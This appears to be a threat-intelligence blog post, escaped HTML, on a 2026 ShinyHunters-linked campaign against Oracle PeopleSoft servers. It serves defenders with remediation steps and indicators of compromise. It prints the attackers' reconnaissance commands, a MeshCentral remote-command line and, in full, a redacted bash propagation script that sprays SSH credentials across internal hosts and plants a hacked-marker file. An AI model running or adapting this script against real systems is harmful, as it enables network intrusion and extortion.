    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Remediation and Hardening Quick Guide&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7ff8a4275d00&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;image&amp;#x27;, None)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Threat Detail &amp;amp; Campaign Overview&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On June 9 2026, &lt;/span&gt;&lt;a href="https://x.com/nahamike01/status/2064529246178210220?s=46&amp;amp;t=DT1t7WC3zIgctMHBQDruCQ" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;public threat reports&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; highlighted open attacker directories. GTIG triaged five sequential IP addresses: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.186&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.187&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.188&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.189&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.190&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. These systems were hosting Python SimpleHTTP servers on port 8888, exposing directory contents that included staging materials, customized agents, and attacker command histories.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The staging infrastructure hosted pre-configured Windows MeshCentral agent binaries disguised as Microsoft Azure services, specifically named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;meshagent32-azure-ops.exe&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;meshagent64-azure-ops.exe&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;meshagent64-v2.exe&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. MeshCentral is an open-source remote management server; its agent is software that runs on remote devices to allow for remote management across various operating systems, including Windows, Linux, macOS, and FreeBSD. Static analysis indicates these agents were hardcoded to establish communication with the command and control (C2) server &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://azurenetfiles.net:443/agent.ashx&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. The domain &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;azurenetfiles.net&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; was chosen to mimic legitimate Microsoft Azure NetApp Files endpoints, a common masquerading tactic. An unconfigured Linux &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;meshagent&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; binary was also staged, suggesting that the threat actors passed parameters dynamically via the command line during deployment.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Global Notification Response Campaign&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Prior to the discovery of the open staging directories, we began an effort to alert over 100 exposed organizations&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; to assist in restricting access to vulnerable endpoints. These organizations are significantly concentrated in the Higher Education sector; 68 percent are academic institutions, including universities and colleges worldwide.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While several organizations successfully blocked the activity or remediated the vulnerabilities, others experienced compromise, resulting in stolen data being published on the ShinyHunters DLS.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Technical Analysis &amp;amp; Command History&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The exposed &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.bash_history&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, which was identical across all five staging hosts, outlines the server configuration and administrative actions. The technical narrative begins with the configuration of the staging environment. On May 27, 2026, at 22:14 UTC, the attackers installed the MeshCentral remote management server (version 1.1.59) to establish their C2 staging environment. Shortly after, at 22:25 UTC, they installed the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;acme-client&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; npm package to automate the provisioning of Let's Encrypt SSL certificates for the masquerading domain "&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;azurenetfiles.net&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;".  The attackers interacted with compromised systems using the MeshCentral command-line interface utility &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;meshctrl.js&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The command history shows the threat actors performing targeted reconnaissance within compromised internal networks. They mapped Oracle PeopleSoft configurations by inspecting mount points, checking the process scheduler configuration file &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;psappsrv.cfg&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and reading WebLogic server XML configurations (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;config.xml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;)&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. The session log ends with the attackers establishing an outbound SSH connection from their staging system to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;176.120.22.24&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, which hosts the public clearnet mirror of the ShinyHunters DLS&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An analysis of the exposed command history reveals the key administrative and malicious operations performed by the threat actors on the staging servers (timestamps were not available in every case):&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Staging Infrastructure Setup:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;May 27, 2026, 22:14 UTC:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Installed MeshCentral (v1.1.59) and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;22:25 UTC:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Installed "acme-client" to establish the C2 staging environment and automate SSL certificate provisioning for &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;azurenetfiles.net&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Staged the compiled Windows agent binaries (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;meshagent32-azure-ops.exe&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, etc.) designed to communicate back to the C2 address: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://azurenetfiles.net:443/agent.ashx&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;May 29, 2026, 18:46 UTC:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The attackers checked for the availability of the "authenticode" tool on the staging system using the command &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;npm list global authenticode&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. This command would return any npm package with a name starting in 'authenticode', such as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;authenticode-sign&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, used for signing binaries, or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;authenticode&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, used for examining metadata on a file.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Targeted Internal Reconnaissance:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Leveraged the MeshCentral CLI utility &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;meshctrl.js&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; to execute administrative command queries on compromised remote endpoints: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;hostname; id&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mapped Oracle PeopleSoft system configurations by inspecting the process scheduler configuration file (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;psappsrv.cfg&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to extract machine names and IP addresses:&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;grep -hE '\''^[[:space:]]*Address=|^[[:space:]]*HostName='\'' /u01/app/psoft/ps_config_homes/csprd/appserv/prcs/psappsrv.cfg 2&amp;gt;/dev/null | head -80&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Audited network configurations and active mounts on compromised hosts: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mount | grep -E "psoft|ps_config|nfs"&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mapped internal subnet hosts by querying local hosts tables: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;cat /etc/hosts | grep -E "[redacted_victim_string]"&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inspected WebLogic XML configurations (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;config.xml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to map internal application servers.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Lateral Movement &amp;amp; Script Propagation:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Wrote the lateral propagation script &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;[victim_abbreviation]_fanout.sh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; via a heredoc to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/tmp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; on the staging host.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Triggered the execution of the propagation script on compromised hosts using the MeshCentral command execution feature&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;node meshctrl.js RunCommand --loginuser admin --loginpass '[password]' --id '[agent_id]' --run 'bash /tmp/[victim_abbreviation]_fanout.sh'&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Verified propagation success by running remote checks for the defacement marker file &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4. Exfiltration &amp;amp; DLS Connection:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compressed exfiltrated directories containing stolen data using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;zstd&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;pv -s "$(du -sb exfil | awk '{print $1}')" | zstd -3 -T0 -o exfil.tar.zst&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Concluded operations by establishing an outbound SSH connection from the staging host to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;176.120.22.24&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, the IP address hosting the public mirror of the ShinyHunters Data Leak Site.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="ShinyHunters DLS Post showing Peoplesoft victim added June 9, 2026" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/peoplesoft-shinyhunters.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: ShinyHunters DLS Post showing Peoplesoft victim added June 9, 2026&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Propagation Script &amp;amp; Lateral Movement&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As observed in the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.bash_history&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; log, the threat actors wrote a propagation script named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;[victim_abbreviation]_fanout.sh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; directly to the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/tmp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; directory of the compromised system. This script automates SSH credential spraying against internal hosts by parsing hostnames from the local &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/hosts&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file matching a specific naming pattern. The script attempts authentication using a hardcoded list of common administrative and application-specific usernames and passwords.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upon establishing a successful SSH session, the script copies a defacement and extortion marker file named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; into the WebLogic and Process Scheduler directories. This staging and deployment activity directly correlates with the publication of stolen archives on the ShinyHunters DLS on June 9, 2026.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The redacted contents of the propagation script &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;[victim_abbreviation]_fanout.sh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; are as follows&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;set +e
SRC="/u01/app/psoft/ps_config_homes/csprd/webserv/CSPRD02/README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
NAME="README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
BASE="/u01/app/psoft/ps_config_homes/csprd"
export PATH=/usr/bin:/bin
# hosts from /etc/hosts — internal PS nodes only
HOSTS=$(grep -E '[redacted_victim_host_pattern]|csprd[0-9]' /etc/hosts | awk '{print $2}' | grep -v '^#' | sort -u)
echo "HOSTS=$(echo $HOSTS | wc -w)"
PWDS="[redacted_passwords]"
USERS="[redacted_usernames]"
OK=0; FAIL=0; SKIP=0
for h in $HOSTS; do
  echo "=== $h ==="
  copied=0
  for u in $USERS; do
    for p in $PWDS; do
      sshpass -p "$p" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=no $u@$h "hostname" &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 &amp;amp;&amp;amp; {
        for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
          sshpass -p "$p" ssh -o StrictHostKeyChecking=no $u@$h "test -d $dest &amp;amp;&amp;amp; mkdir -p $dest &amp;amp;&amp;amp; cat &amp;gt; $dest/$NAME" &amp;lt; "$SRC" 2&amp;gt;/dev/null &amp;amp;&amp;amp; echo "  OK $dest ($u)" &amp;amp;&amp;amp; OK=$((OK+1)) &amp;amp;&amp;amp; copied=1
        done
        break 2
      }
    done
  done
  if [ $copied -eq 0 ]; then
    # try key-based
    ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=yes $USER@$h "hostname" &amp;gt;/dev/null 2&amp;gt;&amp;amp;1 &amp;amp;&amp;amp; copied=1 || true
    if [ $copied -eq 0 ]; then echo "  FAIL ssh"; FAIL=$((FAIL+1)); fi
  fi
done
# local paths on this host
for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
  if [ -d "$dest" ]; then cp -f "$SRC" "$dest/$NAME" &amp;amp;&amp;amp; chmod 644 "$dest/$NAME" &amp;amp;&amp;amp; echo "LOCAL OK $dest"; fi
done
echo SUMMARY ok=$OK fail=$FAIL
find $BASE -name "$NAME" -type f 2&amp;gt;/dev/null&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Remediation and Hardening&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To defend against this campaign, we recommend that organizations running Oracle PeopleSoft immediately implement the following security measures:&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Network Isolation &amp;amp; WAF Rules&lt;/span&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Endpoint Access Restrictions:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;span style="vertical-align: baseline;"&gt;If you cannot disable the EMHub Service, &lt;/span&gt;immediately block external network access to the sensitive endpoints &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/PSEMHUB/*&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (specifically &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/PSEMHUB/hub&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/PSIGW/HttpListeningConnector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; at the network perimeter or firewall level. Relying solely on Web Application Firewall (WAF) body-inspection rules is insufficient, as these controls can be bypassed.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Non-Breaking Action:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Restricting these endpoints is considered non-breaking for standard end-user operations. The Environment Management Hub (EMHub) and the Integration Broker Listening Connector are administrative or system-to-system components and are not required for the core user-facing PeopleSoft Internet Architecture (PIA) browser sessions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Log &amp;amp; Endpoint Monitoring&lt;/span&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Access Log Analysis:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Audit the PIA WebLogic access logs for HTTP &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;POST&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; requests directed at &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/PSEMHUB/hub&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/PSIGW/HttpListeningConnector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; originating from external or untrusted source IP addresses.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SSRF Detection:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Analyze requests to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/PSIGW/HttpListeningConnector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for loopback IP addresses (such as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;127.0.0.1&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;localhost&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;::1&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) or internal IP ranges passed within request headers or parameters. This is a common method for attackers to perform Server-Side Request Forgery (SSRF) to bypass access controls.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Network Telemetry&lt;/span&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Outbound Port 445 Monitoring:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Monitor outbound firewall logs and NetFlow data for outbound SMB traffic (TCP port 445) originating from PeopleSoft hosts to untrusted, external internet destinations. The exploit chain may coerce the system into making outbound connections in an attempt to capture Windows machine-account NetNTLM hashes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Host-Level Auditing &amp;amp; Filesystem Checks&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Conduct a thorough forensic audit of the web-tier filesystem on PeopleSoft hosts for indicators of compromise:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Webshell Detection:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Scan the WebLogic web application directory &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;&amp;lt;PS_CFG_HOME&amp;gt;/webserv/&amp;lt;domain&amp;gt;/applications/peoplesoft/PSEMHUB.war/&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for any unexpected &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;*.jsp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files that are not part of the shipped product.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Unauthorized Staging:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Inspect the staging directory &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.../PSEMHUB.war/envmetadata/transactions/&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for unauthorized folders, files, or binary drops.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Unexpected Directories:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Look for unexpected directories named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;logs&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;persistantstorage&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;scratchpad&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; under the PSEMHUB directories.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;XMLDecoder Persistence:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Check &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;&amp;lt;docroot&amp;gt;/envmetadata/data/environment/&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for recently created or modified &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;.xml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files, which may be leveraged by threat actors to execute remote code via XMLDecoder upon application restart.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;In alignment with Oracle’s security advisory, we consider the implementation of these mitigations to be a high-priority risk reduction measure and strongly &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;recommend&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; immediate action to address the identified exposure. As this vulnerability is remotely exploitable without authentication and may result in remote code execution, organizations must remain on actively supported versions and apply all Critical Patch Updates, Critical Security Patch Updates, and Security Alerts without delay. Review the full&lt;/span&gt; &lt;a href="https://www.oracle.com/security-alerts/alert-cve-2026-35273.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Oracle Security Alert Advisory - CVE-2026-35273&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for complete details.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Indicators of Compromise (IOCs)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a &lt;a href="https://www.virustotal.com/gui/collection/50ac0ffbc9ecf4559949faa026a412c9bb57e81d3ae0714a4dcd25b4fec35105" rel="noopener" target="_blank"&gt;GTI collection&lt;/a&gt; for registered users.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Staging &amp;amp; C2 Network Indicators&lt;/span&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.186&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.187&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.188&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;142.11.200.189&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
